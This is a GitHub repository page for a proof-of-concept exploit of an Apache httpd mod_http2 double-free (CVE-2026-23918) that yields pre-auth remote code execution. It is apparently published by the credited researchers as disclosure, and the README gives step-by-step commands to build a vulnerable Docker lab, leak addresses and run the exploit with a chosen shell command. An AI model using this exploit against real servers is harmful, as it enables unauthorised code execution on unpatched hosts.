Skip to content

striga-ai/CVE-2026-23918

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

1 Commit
Dockerfile
Dockerfile
 
 
README.md
README.md
 
 
getaddr.py
getaddr.py
 
 
poc.py
poc.py
 
 

Repository files navigation

CVE-2026-23918

Double-free in Apache httpd mod_http2 stream cleanup leading to pre-auth RCE.

Affected: httpd 2.4.66 with mod_http2 and multi-threaded MPM (event/worker). Fixed in: 2.4.67.

Found and reported by Bartlomiej Dmitruk (striga.ai) and Stanislaw Strzalkowski (isec.pl).

Writeup: https://striga.ai/research/apache-httpd-mod-http2-double-free

Requirements

  • Docker
  • Python 3

Usage

Build and start the vulnerable environment:

docker build -t httpd-poc .
docker run -d --name httpd-poc --privileged -p 9443:443 httpd-poc

Get system() and scoreboard addresses:

docker exec httpd-poc python3 /getaddr.py 1

Run the exploit:

python3 poc.py --host localhost --port 9443 \
    --cmd 'date >> /tmp/win' --workers 64 \
    --system <system_addr> --scoreboard <scoreboard_addr>

Verify (execution is probabilistic, may take minutes to hours):

docker exec httpd-poc cat /tmp/win

Cleanup

docker rm -f httpd-poc

About

Double-free in Apache httpd mod_http2 stream cleanup leading to pre-auth RCE.

Resources

Readme
Activity
Custom properties

Stars

29 stars

Watchers

0 watching

Forks

6 forks
Report repository

Contributors

Languages